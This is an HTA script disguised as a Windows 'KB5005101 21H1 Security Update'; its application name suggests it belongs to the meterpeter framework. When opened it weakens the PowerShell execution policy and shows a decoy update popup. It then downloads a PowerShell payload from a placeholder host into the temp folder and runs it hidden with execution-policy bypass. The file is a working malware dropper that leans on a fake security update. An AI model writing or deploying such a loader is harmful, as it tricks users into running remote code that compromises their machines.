<title>KB5005101 21H1 Security Update</title>
<script>
   path = document.URL
   document.write(
      '<HTA:APPLICATION ID="oHTA" APPLICATIONNAME="meterpeter" SHOWINTASKBAR="yes" ICON="https://github.com/favicon.ico">'
   );
   Loki=new ActiveXObject("WScript.Shell");
   Loki.run("cmd /R echo Y|Powershell Set-ExecutionPolicy UnRestricted -Scope CurrentUser", 0);
   Loki.run("powershell (New-Object -ComObject Wscript.Shell).Popup('THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.',8,'KB5005101 21H1 Security Update',0+0)", 0);
   Loki.run("powershell cd $Env:TMP;iwr -Uri 'http://CharlieBrown/Update-KB5005101.ps1' -OutFile 'Update-KB5005101.ps1';powershell -W 1 -exec bypass -File 'Update-KB5005101.ps1'", 0);
   window.close();
</script>